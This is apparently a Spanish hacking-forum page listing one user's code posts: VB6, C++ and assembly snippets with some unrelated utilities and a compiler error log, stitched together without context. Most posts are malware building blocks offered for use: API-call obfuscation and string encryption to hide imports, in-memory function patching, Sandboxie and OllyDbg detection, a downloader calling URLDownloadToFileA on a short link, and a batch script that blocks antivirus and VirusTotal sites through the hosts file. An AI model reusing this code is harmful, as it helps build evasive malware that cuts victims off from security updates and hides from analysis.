Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú'OLEAUT32
Private Declare Function SysAllocString Lib "OLEAUT32" (ByVal pOlechar As Long) As String
'KERNEL32
Private Declare Function GetModuleHandleA Lib "KERNEL32" (ByVal ModuleName As String) As Long
Public Static Function WhereAmI() As String
WhereAmI = SysAllocString(GetModuleHandleA("MSVBVM60") + &H10C528)
End Function
MsgBox WhereAmI()
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByRef first_asm As Currency, ByRef params() As Variant, ByVal lib As String, ByVal fnc As String, Optional ByVal null0 As Long = 0) As Long
'---------------------------------------------------------------------------------------
' Author : Karcrack
' Date : 12092013
' Credits: sonykuccio (http://hackhound.org/forums/topic/2790-vb6asm-%C2%B5callapi/)
'---------------------------------------------------------------------------------------
Public Function NanoInvoke(ByRef sLib As String, ByRef sFnc As String, ParamArray params() As Variant) As Long
Dim asm(11) As Currency
Dim p() As Variant
If UBound(params) >= 0 Then p = params
asm(0) = -881438862054780.1504@: asm(1) = -140193315782017.312@: asm(2) = 93112413858165.2867@: asm(3) = 593189448021741.0902@
asm(4) = 843045704464075.3748@: asm(5) = -4834317066834.7356@: asm(6) = 260429944098681.7488@: asm(7) = 537140947255014.6699@
asm(8) = 7683543183094.8624@: asm(9) = 598313605633923.5838@: asm(10) = -200740417519275.4208@: asm(11) = 109.8337@
NanoInvoke = CallWindowProcW(asm(0), p, sLib, sFnc)
End Function
' ASM Code: pastebin.com/5gnLv7xn
Call NanoInvoke("user32", "MessageBoxW", 0, StrPtr("test"), StrPtr("karcrack"), 0)
Call NanoInvoke("kernel32", "ExitProcess", 0)
Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh
<Import Project="C:\Users\Karcrack\Desktop\kPreprocessor\kPreprocessor.targets" />
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" TreatAsLocalProperty="OutDir">
<Target Name="kPreprocessor" BeforeTargets="CLCompile">
<Exec Command='python "C:\Users\Karcrack\Desktop\kPreprocessor\kPreprocessor.py" %(CLInclude.FullPath) %(CLCompile.FullPath)' />
</Target>
<Target Name="kCleanPreProc" AfterTargets="Link">
<Exec Command='python "C:\Users\Karcrack\Desktop\kPreprocessor\kPreprocessor.py" -clean' />
</Target>
</Project>
# -*- coding: utf8 -*-
from sys import argv
from shutil import copyfile
import os, re
def save2dump(s):
f = open("./dump","a")
f.write(s)
f.close()
if __name__ == "__main__":
if argv[1] == "-clean":
print "[kP] Limpiando y restaurando ficheros."
for file_name in os.listdir("./"):
root, ext = os.path.splitext(file_name)
if ext == ".kbak":
os.remove(os.path.join("./", root))
os.rename(os.path.join("./", file_name), os.path.join("./", root))
os.remove("./dump")
else:
file_path = argv[1]
print "[kP] Trabajando sobre el fichero '%s'" % (file_path)
#Backup
copyfile(file_path, file_path+".kbak")
#Read SRC
with open(file_path, "r") as r:
raw = r.read()
#INCLUDE_PYSRC()
for i in re.findall("(?<=INCLUDE_PYSRC\()(.*?)(?=\)\n)", raw, re.DOTALL):
with open(os.path.abspath(i), 'r') as fi:
save2dump(fi.read()+"\n")
#DEFINE_PYSRC()
r = re.findall("(?<=DEFINE_PYSRC\(\n)(.*?)(?=\)DEFINE_END\(\))", raw, re.DOTALL)
if len(r)>0:
save2dump(''.join(r) + "\n")
#Load src
try:
exec open("./dump", "r")
except IOError as e:
pass
#Resolve macros
for fu in re.findall("(?<=#define)(.*?)(?=\(\.\.\.\) *PYTHON_FUNCTION\(\))", raw, re.DOTALL):
raw = re.sub("("+fu+"\([^\.?].*?\)(?=[^\:]))", lambda m:str(eval(m.group(1))), raw)
#Save file
with open(file_path, "w+") as f:
f.write(raw)
#ifndef PRETEST
#define PRETEST
#include <Windows.h>
#include "../../kPreprocessor/kPreprocessor.h"
INCLUDE_PYSRC(.\test.py)
DEFINE_PYSRC(
def TEST():
return 12
)DEFINE_END()
#endif
#pragma comment(linker, "/ENTRY:main")
#include "Header.h"
#define XOR_STR(...) PYTHON_FUNCTION()
#define MD5(...) PYTHON_FUNCTION()
#define TEST(...) PYTHON_FUNCTION()
void main(){
MessageBoxA(0, XOR_STR("karcrack", 0xFF), MD5("karcrack"), TEST( ));
}
#Glenn Maynard
def string_to_c(s, max_length = 140, unicode=False):
ret = []
# Try to split on whitespace, not in the middle of a word.
split_at_space_pos = max_length - 10
if split_at_space_pos < 10:
split_at_space_pos = None
position = 0
if unicode:
position += 1
ret.append('L')
ret.append('"')
position += 1
for c in s:
newline = False
if c == "\n":
to_add = "\\\n"
newline = True
elif ord(c) < 32 or 0x80 <= ord(c) <= 0xff:
to_add = "\\x%02x" % ord(c)
elif ord(c) > 0xff:
if not unicode:
raise ValueError, "string contains unicode character but unicode=False"
to_add = "\\u%04x" % ord(c)
elif "\\\"".find(c) != -1:
to_add = "\\%c" % c
else:
to_add = c
ret.append(to_add)
position += len(to_add)
if newline:
position = 0
if split_at_space_pos is not None and position >= split_at_space_pos and " \t".find(c) != -1:
ret.append("\\\n")
position = 0
elif position >= max_length:
ret.append("\\\n")
position = 0
ret.append('"')
return "".join(ret)
def XOR_STR(str, c):
s = ""
for x in str:
s+= chr(ord(x)^c)
return string_to_c(s)
def MD5(s):
import md5
return string_to_c(md5.new(s).hexdigest())
#ifndef CRYPTAPI
#define CRYPTAPI
struct FNV1a{
template <size_t N>
__forceinline static DWORD hash(const char (&str)[N]){
return (hash<N-1>((const char(&)[N-1])str)^str[N-1]) * 16777619u;
};
template <>
__forceinline static DWORD hash<1>(const char (&str)[1]){
return (2166136261u^str[0]) * 16777619u;
};
__forceinline static DWORD hash(char* str){
DWORD r = 2166136261u;
do{
r ^= *str;
r *= 16777619u;
}while(*str++);
return r;
};
};
struct CUSTOM{
template <size_t N>
__forceinline static DWORD hash(const char (&str)[N]){
return ((hash<N-1>((const char(&)[N-1])str) ^ (str[N-1] << 24)) >> 2);
};
template <>
__forceinline static DWORD hash<1>(const char (&str)[1]){
return (str[0]<<24)>>2;
};
__forceinline static DWORD hash(char* str){
DWORD r = 0;
do{
r ^= (*str << 24);
r >>= 2;
}while(*str++);
return r;
};
};
template <class ret, class hashFnc = FNV1a> class invoke{
private:
char* base;
DWORD FuncHash;
public:
template <size_t N, size_t M>
invoke(const char (&DLL)[N], const char (&Func)[M]){
base = (char*)LoadLibraryA(DLL);
FuncHash = hashFnc::hash<M>(Func);
};
ret operator()(int numArgs, ...){
BYTE* dirApi;
IMAGE_DOS_HEADER* IDH = (IMAGE_DOS_HEADER*)base;
IMAGE_NT_HEADERS* INH = (IMAGE_NT_HEADERS*)(base + IDH->e_lfanew);
IMAGE_OPTIONAL_HEADER* IOH = &INH->OptionalHeader;
IMAGE_DATA_DIRECTORY* IDE = (IMAGE_DATA_DIRECTORY*)(&IOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
IMAGE_EXPORT_DIRECTORY* IED = (IMAGE_EXPORT_DIRECTORY *)(base + IDE->VirtualAddress);
void** FTABLE = (void **)(base + IED->AddressOfFunctions);
WORD* OTABLE = (WORD *)(base + IED->AddressOfNameOrdinals);
char** NTABLE = (char **)(base + IED->AddressOfNames);
for (DWORD i = 0; i <= IED->NumberOfNames; i++){
if (hashFnc::hash(base + (DWORD)NTABLE[i]) == FuncHash){
dirApi = (BYTE*)(base + (DWORD)FTABLE[OTABLE[i]]);
break;
}
}
va_list listaArgs;
void** args;
va_start(listaArgs, numArgs);
args = &va_arg(listaArgs, void*);
for(int n=numArgs-1; n>=0; n--){
void* temp = args[n];
__asm
push [temp]
}
va_end(listaArgs);
__asm
call dirApi
};
};
#endif
invoke<%TIPO_DE_RETORNO%,%ALGORITMO_USADO%>(%NOMBRE_DLL%,%NOMBRE_FUNCION%)(%N_PARAMETROS%,%PARAMETRO1%,%PARAMETRO2%,...,%PARAMETRON%);
#pragma comment(linker,"/ENTRY:main")
#include <Windows.h>
#include "cryptAPI.hpp"
void main(){
invoke<void, FNV1a>("URLMON", "URLDownloadToFileA")(5, 0, "http://goo.gl/veps2", "C:/test.png", 0, 0);
invoke<BOOL, FNV1a>("KERNEL32", "ExitProcess")(1, 0);
}
http://foro.h-sec.org/programacion/(template)-cryptapi-cifra-la-llamada-a-las-apis-d
strlen:
pop edx
pop edi
push -1
pop ecx
xor eax, eax
repne scasb
not ecx
mov eax, ecx
jmp edx
http://foro.elhacker.net/programacion_vb/src_deshabilitar_taskmgr_nuevo_metodo-t266708.0.html
CitarLocal\TM.750ce7b0-e5fd-454f-9fad-2f66513dfa1b
Private Declare Function rtcGetHostLCID Lib "MSVBVM60" () As Long
Private Sub Form_Load()
MsgBox rtcGetHostLCID
End Sub
push $30 ;v
pop ebx ;>EBX = 0x30
mov cl, 4 ;>CL = 4
@@:mov al, cl ;>AL = CL <<<
db $64 ;v ^
xlatb ;>AL = FS:[EBX+AL] ^
shl eax, 8 ;>EAX <<= 8 ^
loop @B ;>>>>>>>>>>>>>>>>>>>^ (--ECX>0)?
push $30
pop esi
db $64
lodsd
Option Explicit
'KERNEL32
Private Declare Function GetVersion Lib "KERNEL32" () As Long
'SHELL32
Private Declare Function SHGetUserPicturePath Lib "SHELL32" Alias "#261" (ByVal pUserOrPicName As Long, ByVal sguppFlags As Long, ByVal pwszPicPath As Long, ByVal picPathLen As Long) As Long
Private Declare Function xp_SHGetUserPicturePath Lib "SHELL32" Alias "#233" (ByVal pUserOrPicName As Long, ByVal sguppFlags As Long, ByVal pwszPicPath As Long) As Long
Private Const SGUPP_CREATEPICTURESDIR = &H80000000
Public Function LoadUserTile() As IPictureDisp
Dim sPath As String
sPath = String$(256, vbNullChar)
Select Case (GetVersion() And &HFF)
Case 5
Call xp_SHGetUserPicturePath(0, SGUPP_CREATEPICTURESDIR, StrPtr(sPath))
Case 6
Call SHGetUserPicturePath(0, SGUPP_CREATEPICTURESDIR, StrPtr(sPath), 256)
End Select
sPath = Left$(sPath, InStr(1, sPath, vbNullChar) - 1)
Set LoadUserTile = LoadPicture(sPath)
End Function
Private Sub Form_Load()
Picture1.Picture = LoadUserTile()
End Sub
s=document.createElement('script');s.src="http://code.jquery.com/jquery-latest.pack.js";document.getElementsByTagName('head')[0].appendChild(s);setTimeout(function(){$.noConflict()("[id^='event_invitation_unprocessed_item']").each(function(){jQuery(this).trigger('click')})},500)
Option Explicit
'---------------------------------------------------------------------------------------
' Module : mPatchFunction
' Author : Karcrack
' Date : 27/11/2011
' Purpose : Patch function with JMP to new addr
'---------------------------------------------------------------------------------------
'NTDLL
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
Private Const CURRENT_PROCESS = (-1)
Public Function PatchFunction(ByVal pFnc As Long, ByVal pNewFnc As Long, Optional ByVal hProc As Long = CURRENT_PROCESS) As Boolean
Dim cCode As Currency
cCode = &HB8& * (0.0001@) 'mov EAX, imm32
cCode = cCode + (pNewFnc * 0.0256@) 'imm32
cCode = cCode + (&HE0FF& * 109951162.7776@) 'jmp EAX
PatchFunction = NtWriteVirtualMemory(hProc, ByVal pFnc&, cCode, &H8, 0&)
End Function
Sub Main()
Dim pMessageBoxW As Long
pMessageBoxW = GetProcAddress(LoadLibrary("USER32"), "MessageBoxW")
If PatchFunction(AddressOf MessageBoxW__, pMessageBoxW) Then
If MessageBoxW__(0, "Did you like the function?", "Karcrack", vbYesNo) = vbYes Then
Call MessageBoxW__(0, "Glad you liked it", "Karcrack", 0)
Else
Call MessageBoxW__(0, "F**k you bastard xD", "Karcrack", 0)
End If
End If
End Sub
Public Function MessageBoxW__(ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
'JMP &MessageBoxW@USER32
End Function
'---------------------------------------------------------------------------------------
' Module : mMemory
' Author : Karcrack
' Date : 20/09/2011
' Purpose : Work with memory withouth using any API
' History : 20/09/2011 First cut .....................................................
'---------------------------------------------------------------------------------------
Option Explicit
Private bvHack(0) As Byte
Private lHackDelta As Long
Private bInitialized As Boolean
Public Function Initialize() As Boolean
On Error GoTo Error_Handle
bvHack(-1) = bvHack(-1) 'Error check
lHackDelta = VarPtr(bvHack(0))
Initialize = True
bInitialized = Initialize
Exit Function
Error_Handle:
If Err.Number = 9 Then Debug.Print "Remember to tick 'Remove array boundary check' and compile before using"
End
End Function
Public Function GetByte(ByVal lPtr As Long) As Byte
If bInitialized Then GetByte = bvHack(lPtr - lHackDelta)
End Function
Public Function GetWord(ByVal lPtr As Long) As Integer
If bInitialized Then GetWord = MakeWord(GetByte(lPtr + &H0), GetByte(lPtr + &H1))
End Function
Public Function GetDWord(ByVal lPtr As Long) As Long
If bInitialized Then GetDWord = MakeDWord(GetWord(lPtr + &H0), GetWord(lPtr + &H2))
End Function
Public Sub PutByte(ByVal lPtr As Long, ByVal bByte As Byte)
If bInitialized Then bvHack(lPtr - lHackDelta) = bByte
End Sub
Public Sub PutWord(ByVal lPtr As Long, ByVal iWord As Integer)
If bInitialized Then Call PutByte(lPtr + &H0, iWord And &HFF): Call PutByte(lPtr + &H1, (iWord And &HFF00&) \ &H100)
End Sub
Public Sub PutDWord(ByVal lPtr As Long, ByVal lDWord As Long)
If bInitialized Then Call PutWord(lPtr + &H0, IIf(lDWord And &H8000&, lDWord Or &HFFFF0000, lDWord And &HFFFF&)): Call PutWord(lPtr + &H2, (lDWord And &HFFFF0000) \ &H10000)
End Sub
Private Function MakeWord(ByVal loByte As Byte, ByVal hiByte As Byte) As Integer '[http://www.xbeat.net/vbspeed/c_MakeWord.htm#MakeWord02]
If hiByte And &H80 Then
MakeWord = ((hiByte * &H100&) Or loByte) Or &HFFFF0000
Else
MakeWord = (hiByte * &H100) Or loByte
End If
End Function
Private Function MakeDWord(ByVal LoWord As Integer, ByVal HiWord As Integer) As Long '[http://www.xbeat.net/vbspeed/c_MakeDWord.htm#MakeDWord05]
MakeDWord = (HiWord * &H10000) Or (LoWord And &HFFFF&)
End Function
'---------------------------------------------------------------------------------------
' Module : mAPIPatchByID
' Author : Karcrack
' Now : 23/04/2011 14:13
' Purpose : Patch API functions by ID
' History : 23/04/2011 First cut .........................................................
'---------------------------------------------------------------------------------------
Option Explicit
'KERNEL32
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
Public Sub PatchAPIAddr(ByVal lID As Long, ByVal lAddr As Long)
Dim hInstance As Long
Dim lExtTablePtr As Long
hInstance = App.hInstance
lExtTablePtr = GetDWORD(GetDWORD((hInstance + GetDWORD(hInstance + GetDWORD(hInstance + &H3C) + &H28)) + &H1) + &H30) + &H234
If GetDWORD(lExtTablePtr + &H4) >= lID Then
Call PutDWORD(GetDWORD(GetDWORD(GetDWORD(lExtTablePtr) + (8 * lID) + 4) + &H19), lAddr)
End If
End Sub
Private Sub PutDWORD(ByVal lAddr As Long, ByVal lDWORD As Long)
Call NtWriteVirtualMemory(-1, ByVal lAddr, lDWORD, 4, ByVal 0&)
End Sub
Private Function GetDWORD(ByVal lAddr As Long) As Long
Call NtWriteVirtualMemory(-1, GetDWORD, ByVal lAddr, 4, ByVal 0&)
End Function
Option Explicit
'USER32
Private Declare Function MessageBox Lib "nadaesloqueparece" Alias "Karcrack" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
'KERNEL32
Private Declare Function GetProcAddress Lib "KERNEL32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibrary Lib "KERNEL32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Sub Main()
Call PatchAPIAddr(2, GetProcAddress(LoadLibrary("USER32"), "MessageBoxA"))
Call MessageBox(0, "Te has fijado en la declaracion del API 'MessageBox'?", "Hola :)", 0)
End Sub
Option Explicit
'USER32
Private Declare Function fnc1& Lib "whatever" (ByVal a&, ByVal b&, ByVal c&, ByVal d&)
Private Declare Function fnc2& Lib "whatever" (ByVal a&, ByVal b&)
'KERNEL32
Private Declare Function GetProcAddress Lib "KERNEL32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibrary Lib "KERNEL32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Const u32$ = "ZXJW87"
Private Const msgbx$ = "RjxxfljGt}\"
Private Const ktmr$ = "PnqqYnrjw"
Private Const stmr$ = "XjyYnrjw"
Private x&
Private bo&
Sub Main()
Dim p&
p = GetProcAddress(LoadLibrary(d(u32)), d(stmr))
Call PatchAPIAddr(3, p)
x = fnc1(0, 0, 2 * 1000, AddressOf tproc)
p = GetProcAddress(LoadLibrary(d(u32)), d(msgbx))
Call PatchAPIAddr(3, p)
p = GetProcAddress(LoadLibrary(d(u32)), d(ktmr))
Call PatchAPIAddr(2, p)
bo = 1
While bo
DoEvents
Wend
End Sub
Private Function d$(s$)
Dim i&
d = s
For i = 1 To Len(d)
Mid$(d, i, 1) = Chr$(Asc(Mid$(d, i, 1)) - 5)
Next i
End Function
Private Function tproc&(ByVal a&, ByVal b&, ByVal c&, ByVal d&)
If fnc1(0, StrPtr("Seguimos?"), StrPtr(":)"), vbYesNo) = vbNo Then
bo = 0
Call fnc2(0, x)
End If
End Function
Option Explicit
'NTDLL
Private Declare Function RtlGetCurrentPeb Lib "NTDLL" () As Long
'MSVBVM60
Private Declare Sub GetMem4 Lib "MSVBVM60" (ByVal Addr As Long, ByRef RetVal As Long)
'---------------------------------------------------------------------------------------
' Procedure : AmISandboxied
' Author : Karcrack
' Date : 13/03/2011
' Purpose : Know if we are running under Sandboxie
'---------------------------------------------------------------------------------------
'
Public Function AmISandboxied() As Boolean
Dim lUPP As Long '&RTL_USER_PROCESS_PARAMETERS
Dim lFlags As Long 'RTL_USER_PROCESS_PARAMETERS.Flags
Call GetMem4(RtlGetCurrentPeb() + &H10, lUPP)
Call GetMem4(lUPP + &H8, lFlags)
AmISandboxied = (lFlags <> 1)
End Function
Option Explicit
'KERNEL32
Private Declare Sub GetStartupInfoW Lib "KERNEL32" (ByRef lpStartupInfo As Any)
'---------------------------------------------------------------------------------------
' Procedure : IsOdbg
' Author : Karcrack
' Date : 12/03/2011
' TestedOn : OllyDbg 1.1 & OllyDbg 2.0.1(Alpha)
' Purpose : Detect whether we are running inside OllyDbg or not.
'---------------------------------------------------------------------------------------
'
Public Function IsOdbg() As Boolean
Dim bvStartupInfo(0 To 16) As Long
Call GetStartupInfoW(bvStartupInfo(0))
IsOdbg = (bvStartupInfo(11) And &H80)
End Function
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
http://foro.elhacker.net/programacion_vb/sourceactualizado_karcrack_project_crypter_encripta_tus_proyectos_en_vb-t221869.0.html
http://foro.elhacker.net/analisis_y_diseno_de_malware/karcrack_project_crypter_v21_kpc-t256127.0.html
200 -> CC
1337 -> MCCCXXXVII
Public Function DecToRoman(ByVal lNum As Long) As String
DecToRoman = Choose(((lNum Mod 10) / 1) + 1, "", "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX")
lNum = lNum - (lNum Mod 10)
DecToRoman = Choose(((lNum Mod 100) / 10) + 1, "", "X", "XX", "XXX", "XL", "L", "LX", "LXX", "LXXX", "XC") & DecToRoman
lNum = lNum - (lNum Mod 100)
DecToRoman = String$((lNum \ 1000), "M") & Choose(((lNum Mod 1000) / 100) + 1, "", "C", "CC", "CCC", "CD", "D", "DC", "DCC", "DCCC", "CM") & DecToRoman
End Function
http://foro.elhacker.net/programacion_vb/newmapiobfuscation_ofuscar_strings_de_las_apis_no_callapibyname-t265942.0.html
'---------------------------------------------------------------------------------------
' Module : mAPIScramble
' Author : Karcrack
' Now : 20/10/2010 22:52
' Purpose : Obfuscate API Declaration in VB6
' History : 20/10/2010 First cut .........................................................
'---------------------------------------------------------------------------------------
Option Explicit
'KERNEL32
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
Public Function UnScrambleAPI(ByVal sLibName As String, ByVal sFuncName As String) As Boolean
Dim pBaseAddress As Long
Dim pVB5 As Long
Dim pProjectInfo As Long
Dim pExtTable As Long
Dim pLibraryName As Long
Dim pFunctionName As Long
Dim iExtCount As Long
Dim iIndex As Long
'Do NOT run it on the IDE
If App.LogMode = 0 Then Debug.Assert (0 = 1): Exit Function
pBaseAddress = App.hInstance
pVB5 = ReadDWORD(pBaseAddress + ReadDWORD(pBaseAddress + ReadDWORD(pBaseAddress + &H3C) + &H28) + 1)
pProjectInfo = ReadDWORD(pVB5 + &H30)
pExtTable = ReadDWORD(pProjectInfo + &H234)
iExtCount = ReadDWORD(pProjectInfo + &H238)
For iIndex = 0 To iExtCount - 1
If ReadDWORD(pExtTable) <> 6 Then
pLibraryName = ReadDWORD(ReadDWORD(pExtTable + &H4) + &H0)
pFunctionName = ReadDWORD(ReadDWORD(pExtTable + &H4) + &H4)
If (pLibraryName <> 0) And (pFunctionName <> 0) Then
If ReadString(pLibraryName) = sLibName Then
If ReadString(pFunctionName) = sFuncName Then
Call WriteString(pLibraryName, Decrypt(sLibName))
Call WriteString(pFunctionName, Decrypt(sFuncName))
UnScrambleAPI = True
End If
End If
End If
End If
pExtTable = pExtTable + 8
Next iIndex
End Function
Private Function ReadDWORD(ByVal lPtr As Long) As Long
Call WriteProcessMemory(-1, ReadDWORD, ByVal lPtr&, &H4, ByVal 0&)
End Function
Private Sub WriteDWORD(ByVal lPtr As Long, ByVal lLng As Long)
Call WriteProcessMemory(-1, ByVal lPtr&, lLng, &H4, ByVal 0&)
End Sub
Private Function ReadString(ByVal lPtr As Long) As String
Dim i As Long
Dim b As Byte
Do
Call WriteProcessMemory(-1, b, ByVal lPtr& + i, &H1, ByVal 0&)
If b = 0 Then Exit Do
ReadString = ReadString & Chr$(b)
i = i + 1
Loop
End Function
Private Sub WriteString(ByVal lPtr As Long, ByVal sStr As String)
Dim bvStr() As Byte
bvStr = StrConv(sStr, vbFromUnicode)
Call WriteProcessMemory(-1, ByVal lPtr, bvStr(0), UBound(bvStr) + 1, ByVal 0&)
End Sub
Private Function Decrypt(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData)
Decrypt = Decrypt & Chr$(Asc(Mid$(sData, i, 1)) - 1)
Next i
End Function
http://www.box.net/shared/sr8rky5tku
'---------------------------------------------------------------------------------------
' Module : mProcessInformation
' Author : Karcrack
' Now : 26/08/2010 15:00
' Purpose : Native Process Enumeration
' History : 26/08/2010 First cut .........................................................
'---------------------------------------------------------------------------------------
Option Explicit
Option Base 0
Public Type PROCESS
sName As String
lPID As Long
End Type
'NTDLL
Private Declare Function NtQuerySystemInformation Lib "NTDLL" (ByVal SystemInformationClass As Long, ByRef SystemInformation As Any, ByVal SystemInformationLength As Long, ByRef ReturnLength As Long) As Long
Private Declare Sub RtlMoveMemory Lib "NTDLL" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Const SystemProcessesAndThreadsInformation As Long = 5&
Private Const STATUS_INFO_LENGTH_MISMATCH As Long = &HC0000004
Public Function RetrieveProcesses() As PROCESS()
Dim bvSPI(17) As Long 'As SYSTEM_PROCESS_INFORMATION
Dim bvTmp() As PROCESS
Dim bvBuffer() As Byte
Dim cbBuffer As Long
Dim lRet As Long
Dim lPos As Long
Dim lSize As Long
ReDim bvTmp(0)
cbBuffer = 1
Do
cbBuffer = cbBuffer * 2
ReDim bvBuffer(cbBuffer)
lRet = NtQuerySystemInformation(SystemProcessesAndThreadsInformation, bvBuffer(0), cbBuffer, lSize)
Loop While lRet = STATUS_INFO_LENGTH_MISMATCH
If lRet < 0 Then Exit Function
lPos = VarPtr(bvBuffer(0))
Do
Call RtlMoveMemory(bvSPI(0), ByVal lPos, 18 * 4)
With bvTmp(UBound(bvTmp))
.lPID = bvSPI(17)
.sName = ReadUStr(bvSPI(15))
End With
lPos = lPos + bvSPI(0)
If bvSPI(0) = 0 Then Exit Do
ReDim Preserve bvTmp(UBound(bvTmp) + 1)
Loop
RetrieveProcesses = bvTmp
Erase bvBuffer
End Function
Private Function ReadUStr(ByVal lPtr As Long) As String
Dim i As Long
Dim uChar As Integer
If Not lPtr > 0 Then Exit Function
i = lPtr
Do
Call RtlMoveMemory(uChar, ByVal i, &H2)
If uChar = 0 Then Exit Do
ReadUStr = ReadUStr & ChrW$(uChar)
i = i + 2
Loop
End Function
http://www.advancevb.com.ar/?p=589
Option Explicit
'MSVBVM60
Private Declare Sub GetMem1 Lib "MSVBVM60" (ByVal lpSource As Any, ByRef Destination As Any)
Private Sub DumbSub(): End Sub
Public Function IsPCode() As Boolean
Dim bTmp As Byte
Call GetMem1(AddressOf DumbSub, bTmp)
IsPCode = (bTmp <> &HC3)
End Function
1337 -> "1337"
------ Operación Volver a generar todo iniciada: proyecto: STUB_kTweet, configuración: Release Win32 ------
Eliminando archivos intermedios y de resultados para el proyecto 'STUB_kTweet', configuración 'Release|Win32'
Compilando...
main.cpp
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(60) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(60) : error C2144: error de sintaxis : '_EXCEPTION_RECORD' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(60) : error C2448: '_except_handler' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(61) : error C2144: error de sintaxis : 'void' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(62) : error C2144: error de sintaxis : '_CONTEXT' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(63) : error C2144: error de sintaxis : 'void' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\excpt.h(64) : error C2059: error de sintaxis : ')'
C:\WinDDK\7600.16385.1\inc\api\windef.h(49) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(51) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(53) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(157) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(158) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(159) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(160) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(161) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(164) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(165) : error C2143: error de sintaxis : falta ';' delante de '*'
